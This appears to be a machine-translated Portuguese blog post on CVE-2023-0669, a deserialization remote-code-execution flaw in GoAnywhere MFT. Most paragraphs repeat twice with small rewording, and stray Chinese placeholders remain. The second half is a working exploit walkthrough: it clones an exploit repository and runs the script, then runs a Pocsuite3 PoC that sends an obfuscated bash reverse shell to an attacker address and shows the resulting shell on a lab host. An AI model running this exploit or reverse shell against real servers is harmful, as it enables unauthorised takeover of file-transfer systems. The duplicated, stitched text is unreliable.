
GoAnywhere MFT CVE-2023-0669 LicenseResponseServlet Vulnerabilidades de Desserialização Python RCE PoC (Prova de Conceito)
CVE-2023-0669 GoAnywhere MFT Desserialização - Blog do Je Yiuwai
CVE-2023-0669 é uma vulnerabilidade de desserialização do GoAnywhere MFT que existe no License Response Servlet devido a uma vulnerabilidade de injeção de comandos pré-autenticada, causada pela desserialização de um objeto controlado por um atacante arbitrário. Um atacante pode explorar essa vulnerabilidade para executar código arbitrário no sistema afetado, levando ao controle total do sistema. A vulnerabilidade afeta versões anteriores a 7.1.2, exclusive.
CVE-2023-0669 é uma vulnerabilidade de desserialização do GoAnywhere MFT que existe no License Response Servlet devido a uma vulnerabilidade de injeção de comandos pré-autenticada que permite a um atacante executar código arbitrário no sistema afetado ao desserializar um objeto controlado pelo atacante. A vulnerabilidade afeta versões anteriores à 7.1.2.
Esta vulnerabilidade pode representar uma séria ameaça à segurança do software de transferência de arquivos corporativo GoAnywhere MFT. Os atacantes podem explorar essa vulnerabilidade para roubar dados sensíveis, adulterar dados, comprometer sistemas, etc. Portanto, os usuários precisam tomar medidas prontamente para proteger a segurança do sistema.
A vulnerabilidade representa uma séria ameaça à segurança do software de transferência de arquivos corporativo GoAnywhere MFT, pois os atacantes podem explorá-la para roubar dados sensíveis, adulterar dados e comprometer sistemas. Portanto, os usuários precisam tomar medidas prontamente para proteger seus sistemas.
O anúncio oficial de segurança foi divulgado e métodos preliminares de verificação foram fornecidos. Os usuários podem verificar se há strings específicas nos logs userdata/logs para determinar se o sistema é afetado por essa vulnerabilidade. Se não for possível aplicar patches, recomenda-se tomar outras medidas de segurança para proteger o sistema.
O comunicado oficial de segurança foi divulgado e métodos preliminares de inspeção foram fornecidos. Os usuários podem verificar se seus sistemas são afetados pela vulnerabilidade procurando por strings específicas no log userdata/logs. Se não for possível aplicar patches, recomenda-se tomar outras medidas de segurança para proteger o sistema.
Resumindo, CVE-2023-0669 é uma vulnerabilidade de desserialização que requer atenção dos usuários. Os usuários precisam atualizar para a versão mais recente prontamente e verificar se seus sistemas são afetados pela vulnerabilidade. Ao mesmo tempo, recomenda-se que os usuários reforcem o gerenciamento de segurança de softwares corporativos como o GoAnywhere MFT e adotem medidas de segurança em várias camadas para proteger a segurança do sistema.
Em resumo, CVE-2023-0669 é uma vulnerabilidade de desserialização que requer a atenção dos usuários. Os usuários precisam atualizar para a versão mais recente prontamente e verificar se seus sistemas são afetados pela vulnerabilidade. Além disso, recomenda-se que os usuários reforcem o gerenciamento de segurança de softwares corporativos como o GoAnywhere MFT e adotem medidas de segurança em várias camadas para proteger seus sistemas.
Este Exploit é um script baseado em Python usado para explorar a vulnerabilidade CVE-2023-0669 em GoAnywhere MFT v6.7.9594 e versões anteriores.
Esta vulnerabilidade existe devido a um problema de segurança no processamento de requisições Bundle criptografadas no GoAnywhere MFT. Um atacante pode enviar uma requisição especialmente criada e executar código arbitrário no servidor alvo.
git clone https://github.com/Avento/CVE-2023-0669.git
cd CVE-2023-0669
pip install requests cryptography
python CVE-2023-0669.py --host <目标服务器IP>
Este Exploit é um script Python usado para explorar a vulnerabilidade CVE-2023-0669 no GoAnywhere MFT v6.7.9594 e versões anteriores.
Esta vulnerabilidade existe devido a um problema de segurança no processamento de requisições Bundle criptografadas no GoAnywhere MFT. Um atacante pode enviar uma requisição especialmente criada para executar código arbitrário no servidor alvo.
git clone https://github.com/Avento/CVE-2023-0669.git
cd CVE-2023-0669
pip install requests cryptography
python CVE-2023-0669.py --host <target IP>
$ python3 CVE-2023-0669.py --host 192.168.47.179:8000
Exploit Success ~
Pocsuite3 (pocs\Java_GoAnywhere_CVE-2023-0669) > check
[11:10:53] [INFO] pocsusite got a total of 1 tasks
[11:10:53] [INFO] running poc:'CVE-2023-0669 GoAnywhere MFT LicenseResponseServlet 反序列化' target 'http://192.168.47.179:8000'
[11:10:53] [+] Version : 7.0.3
[11:10:53] [INFO] Scan completed,ready to print
+----------------------------+--------------------------------------------------------------+---------------+----------------+--------------------------+---------+
| target-url | poc-name | poc-id | component | version | status |
----------+---------+
| http://192.168.47.179:8000 | CVE-2023-0669 GoAnywhere MFT LicenseResponseServlet 反序列化 | CVE-2023-0669 | GoAnywhere MFT | 7.1.2 之前,不 包括 7.1.2 | success |
+----------------------------+--------------------------------------------------------------+---------------+----------------+--------------------------+---------+
success : 1 / 1
Pocsuite3 (pocs\Java_GoAnywhere_CVE-2023-0669) > shell
[11:11:55] [INFO] pocsusite got a total of 1 tasks
[11:11:55] [INFO] running poc:'CVE-2023-0669 GoAnywhere MFT LicenseResponseServlet 反序列化' target 'http://192.168.47.179:8000'
/bin/bash -c bash$IFS-i$IFS>&$IFS/dev/tcp/192.168.47.1/6666<&1
[11:11:55] [*] listening on 0.0.0.0:6666
[11:11:56] [+] new connection established from 192.168.47.179
[11:11:56] [INFO] Scan completed,ready to print
[11:11:56] [INFO] connect back ip: 192.168.47.1 port: 6666
[11:11:56] [INFO] watting for shell connect to pocsuite
Now Connected: 192.168.47.179
SHELL (192.168.47.179) > id
bash: cannot set terminal process group (20029): Inappropriate ioctl for device
bash: no job control in this shell
ubuntu@ubuntu:~/HelpSystems/GoAnywhere$ id
uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lpadmin),126(sambashare)
Autor:Je Yiuwai editado por xiaomi pad 6 pro